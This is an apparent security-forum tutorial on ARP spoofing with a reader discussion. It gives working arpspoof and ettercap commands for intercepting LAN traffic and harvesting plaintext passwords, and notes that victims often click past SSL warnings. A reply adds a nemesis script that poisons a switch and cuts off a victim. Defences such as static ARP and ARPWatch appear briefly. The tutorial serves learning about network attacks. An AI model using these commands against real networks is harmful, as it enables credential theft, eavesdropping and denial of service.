The Basics of Arpspoofing/Arppoisoning

ARP stands for Address Resolution Protocol and it allows the network to translate IP addresses into MAC addresses. Basically, ARP works like this: When one host using IP on a LAN is trying to contact another it needs the MAC address (aka: hardware address) of the host it is trying to contact. It first looks in it’s ARP cache (to see your ARP cache in windows type in “arp –a” at the command line) to see if it already has the MAC address, but if not it broadcasts out an ARP request asking “Yo, who has this IP address I’m looking for?” If the host that has that IP address hears the ARP query it will respond with it’s own MAC address and a conversation can begin using IP.

In common bus networks like Ethernet using a hub or 801.11b all traffic can be seen by all hosts who's NICs are in promiscuous mode, but things are a bit different on switched networks. A switch looks at the data sent to it and tries to only forwards packets to its intended recipient based on MAC address. Switched networks are more secure and help speed up the network by only sending packets where they need to go. There are ways around switches though ;). Using a program like Arpspoof, Ettercap or Cain we can lie to other machines on the local area network and tell them we have the IP they are looking for, thus funneling their traffic through us.

http://irongeek.com/images/mim.png

The image above helps illustrate how arpspoofing/arppoisoning works. Basically, the Cracker is telling Alan's box that he has the IP that corresponds to Brian's box and vice versa. By doing this the Cracker receives all network traffic going between Alan and Brian. Once you have Arpspoofed your way between two machines you can sniff the connection with whatever tool you like (TCPDump, Ethereal, Ngrep, etc.) By arpspoofing between a machine and the LANs gateway you can see all the traffic it's sending out to the Internet. In this tutorial I'm only giving the basics of how to use these tools, look at their specific MAN pages and documentation for a plethora of more advanced options.



Dsniff Tools (arpspoof)

Lets start with using Dug Song's Arpspoof program that comes with his Dsniff ( http://www.monkey.org/~dugsong/dsniff/ ) package. I'll be using the *nix version but if you look around you may be able to find a Win32 version. First thing we should do is make sure packet forwarding is turned on, other wise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I'll show do this for you automatically, but to be sure you may want to do it yourself. Use the following commands, depending on operating system:

Linux:

echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:

sysctl -w net.inet.ip.forwarding=1

Now that our box will forward the traffic we can start Arpspoofing. Let's assume I want to sniff all traffic between a host and the gateway so I can see the traffic it's sending to the Internet. To get traffic in both directions I would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null

The "& >/dev/nul" part is there to make it easier to run from one terminal but you may want to omit it for debugging purposes. Now we can use any package we wish to sniff the connection. To start with I'd recommend using the sniffer dsniff that comes along with arpspoof to sniff for plain text passwords. To look at all sorts of other traffic I would recommend TCPDump or Ethereal. When you are ready to stop arpspoofing issue the following command.

killall arpspoof

This should kill the two instances of arpspoof started above.


Ettercap

Another package you may want to look into is Ettercap ( http://ettercap.sourceforge.net/ ). It's sort of the Swiss army knife of Arpspoofing and password sniffing. I usually use it in non-interactive mode, but by default it has a ncurses interface. Here's a quick example of how to sniff for passwords in non-interactive mode between two machines.

ettercap -NaC 192.168.1.1 192.168.1.2

The "N" option makes it non-interactive, the "a" option tells it to arppoison and the "C" tells it to parse out passwords and usernames. Ettercap and Dsniff are both great tools for sniffing passwords on protocols that send them plaintext (telnet, SMTP, http, etc.) A nice thing about Ettercap is that it will proxy some connections like SSL and allow you to sniff traffic that is usually encrypted, the victim will get a warning message about the certificate, but many folks just click past such things without reading them. If you want to use Ettercap to just arpspoof so you can use another sniffing tool just look in the man page for the "-J" option.

Cain

For you Windows users, look into using Cain ( http://www.oxid.it/cain.html ). It has some great functionality. I have a video tutorial on how to use it here: http://www.irongeek.com/i.php?page=videos/cain1

If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows specific extras built in.



Further research:

Protecting yourself from arpspoofing
Static ARP tables
ARPWatch ( http://www-nrg.ee.lbl.gov/ )

Also see my article on how to Change you MAC address (http://irongeek.com/i.php?page=security/changemac)

Nice, but I think you should have explained more what the ARP protocol exactly is.
Someone who doesn't know about arp and arp poisoning will not completely understand what he/she is doing when poisoning an arp cache. I like the way you write though, this is an excellent effort.

Someone who doesn't know about arp and arp poisoning will not completely understand what he/she is doing when poisoning an arp cache.

*raises hand* Yeah, and I'd be one of those people! Care to add some enlightenment on that? This is something I would really like to pick up on.

And by the way, it's really good to see a really knowledgable "newbie" getting as involved as you are. This is the kinda stuff we need!

Point taken guys. I’m just glad to have found a forum where intelligent questions are asked and answered and I don’t have to sift through 200 “How do I hack” posts.

I just added the following section in blue to the tutorial; let me know if it helps:
Basically, ARP works like this: When one host using IP on a LAN is trying to contact another it needs the MAC address (aka: hardware address) of the host it is trying to contact. It first looks in it’s ARP cache (to see your ARP cache in windows type in “arp –a” at the command line) to see if it already has the MAC address, but if not it broadcasts out an ARP request asking “Yo, who has this IP address I’m looking for?” If the host that has that IP address hears the ARP query it will respond with it’s own MAC address and a conversation can begin using IP.

Irongeek, might want to update the section on Ettercap. The NG version has a GTK on it (you need to specify which interface to use). Unfortunately the NG version seems rather buggy as of late (I'm hoping they stabilize it soon) so people might want to play with the last 0.6.9b (?) version.

hi,

Great tutorial, he might just want to post the screen shots of the what happens when he types in arp -a before spoofing and what happens after spoofing , Also if possible the screen shot when u can see what the victim is doing when he has been arp spoofed. i don't mean the steps here, just the screen shots.

MRG.

Great tutorial! :)

You have a very solid tutorial here but if I may make a suggestion or two for future writings…

Many people write tutorials with the assumption that the audience is competent. This is never the case. When you give advise on how to enable packet forwarding or ARP spoof a network segment, you may want to go over the dangers of what can happen and/or post a DO NOT do list. There are many dangerous things that can happen when you do these things. The first being that you can take down an entire enterprise if you start routing all packets through a Pentium II machine instead of the beefy router your company put in place to handle the traffic.

In this particular tut, you explained how to enable packet forwarding yet you didn’t explain if the commands you issued are static after reboot or terminate when the app exits. This is a baaaaaaaaaad thing. Although the more savvy folks know the answer to this, they are not your audience. I would advise people to use a tool like FRAGROUTER to setup packet forwarding because even if you forget to stop it from forwarding, it is not a static app, meaning that after reboot it will not start up packet forwarding again.

I come from the school of thought which dictates that you understand completely what you are doing and the effects should something go wrong. This is why I like to post advisories in my tutorials as to minimize the surprise factor when something doesn't perform as expected.

Do I make any sense? If not, take a peek at some of my HPING or NMAP tuts.

Excellent effort.

--TH13

Good tutorial....

One teeny little thing along the lines Hoss mentioned regarding the audience.....

What tells your computer whether to use ARP for machines on the local network or to route the packets to the default gateway is the subnet mask assigned to the computer. If the target address doesn't pass the rule laid down in the subnet mask then the computer is remote and the packets should be routed via the gateway. If the target address passes the rule then the target computer is considered "local" and an ARP request should be made.

You kinda made it sound like I can make an ARP request anywhere and many might miss the LAN reference you made.

Thanks for all the feedback folks, I'll keep it in mind for the next tutorial I write.

I have a quick question on this matter: I have a local network consisting of a proxy server to the internet, a w2k box and a linux box. The three boxes are connected using a layer 2 (hw adress) switch.

I spoofed the mac adress of the linux box using ifconfig to the mac adress of the w2k box. So in the arp tables of the proxy, both the linux and the w2k box have the same mac adress. However, when I run tcpdump on the linux box, and I start surfing the net using the w2k box, I do not see the packets of the w2k box on the linux box, despite they both have the same mac adress.

How is this possible? Does the switch only forward packages to 1 port and refuses 2?

It got me puzzled. I expected to see the w2k packages on the linux machine after the spoof.

Honestly, I’m not quite sure of the intricacies of the software/circuitry built into a switch. Has the Linux box sent any traffic to the network so the switch can notice its MAC address? Any other ideas guys?

What does the ARP table on the switch say abot the MAC addresses? After all, the way you described it, it will be the final arbiter.

Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781762) by Tiger Shark
What does the ARP table on the switch say abot the MAC addresses? After all, the way you described it, it will be the final arbiter.

Thats what I thought... but then I got to thinking... can you even look at the mac table of a layer 2 switch? All of the layer two switches I have are not managed and I can't see the table. The ones that are managed are layer 2 and layer 3....

Maybe you just have to wait for the switch to update its table?

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781780) by chsh
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?

I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I Know of a few ways ARP spoofing can be used for DoS, (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don’t have the privileges on my network to really test them to make sure they the fixes work.

Well, the linux box was sending packets too. After the mac spoof, both machines behaved as before. I'm sure the linux mac was spoofed, cause when i looked at the arp table on the router, it listed the 2 IP adresses (one of the linux box, the other one of the w2k box) both with the same mac adress. I just don't understand that if a switch his "routing table" is based on the mac adress it is still able to work properly when it has 2 mac adresses that are the same. Only explanation could be that the switch somehow got hold of the real mac adress. So my spoofing was not effective.

Anyway, much thanks on the replies, and thanks for the great tutorial :)!

Travish,

the switch doesn't have two ipadresses in his arp-table, it just updated the macadress with the ipadress from the victim to the attacker's ip adress, so you will cut off the vitcim in this example.
Now if you'd try a Man in the middle attack ( in this example sit between the switch and the victim ), with lets say ettercap, you'd poison in two directions, thus in the arptable of the switch you'd see the victim's ip adress with the attackers macadress, and the other way around on the victims arptable. In this example the victim would still be able to communicate and surf, while you read what he's doing with for.ex. tcpdump or another sniffer.

Anyway try ettercap for the mitm-attack, and this to see the difference :

#!/bin/bash

counter=0

while [ "$counter" != 1000 ]; do
sleep 1
nemesis arp -S <victim-ip> -D <switch-ip> -m <attacker-mac> -r
done


This is a very simple script to temporary poison a switch, but which would create a victim cut-off. the -r is crucial cause it tells its an arp-reply.
If you tcpdump then on your attackerbox, you'd see all present connections originally to the victim's box contimuing on the attackerbox.

Hey Schrekkie,

Thx for the reply. I think indeed my problem is I don't understand what's happening in the switch. Anyway, for the moment, the victim is not cut off, ever after spoofing. I'll reboot the switch after spoofing, who knows that has something to do with it.
After that I'll try the mitm attack, as explained by you and the tutorial. See how that works.

Errrrr guys, would we get flame for participating in this discussion of doing these illegal stuff?

Errrrr guys, would we get flame for participating in this discussion of doing these illegal stuff?

Certainly not.... because it isn't illegal if you own or have permission to do it on the network you are attempting it on. Now, of course, if you were to start talking in specific terms about a network that you don't have authority to do this kind of thing on then, yes, you might receive a little "flak". So I guess it's all a matter of how you word it.... ;)

moonlight_x,

This site is for security-minded people, and as we all know the thin line between these two possible worlds ( legal - illegal ) is a matter of moral, i guess.
The reason we share this is to educate, help (call it what you want) and to test or use it in safe or trusted environments. If some ass uses these techniques in real-life big networks, he's even a bigger ass than i thought.

I do test too, I do want to learn all about security, I try to learn to hack too, but for me this stays inside my lan. What others do is their problem. ;)

Cheers,

How is it illegal? The guy is doing it on his own network to understand how it works.

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=260643#post781842) by Irongeek
I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I Know of a few ways ARP spoofing can be used for DoS, (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don’t have the privileges on my network to really test them to make sure they the fixes work.
This is perhaps why so many tutorial writers here opt to develop tutorials based on how to break (which isn't necessarily security). To my mind it isn't really a security tutorial until you show a person how to stop it from being attacked/broken in this manner. You could at least amend your current tutorial and discuss how to secure it against MITM attacks. I'll give ya a big hint on where to start: All major OSes have built-in capability that would render ARP poisoning/MITM attacks useless.

Well, I could think of using static arp tables, but that would be a bitch to maintain in a decent sized network. You could do in between certain critical boxes however. Using Arpwatch is also hand for spotting when this kind of shenanigans is going on.

If you have a decent programmable switch, you could set up rules so a certain port on the switch only allows packets of a certain MAC adress. If you don't often move computers on your network, I think this could be a protection against mitma. It requires some bookkeeping of the port-MAC adress tables, but like I said, if you don't move your clients too much, it not a big deal. If you want to do mitma you would have to hack the switch.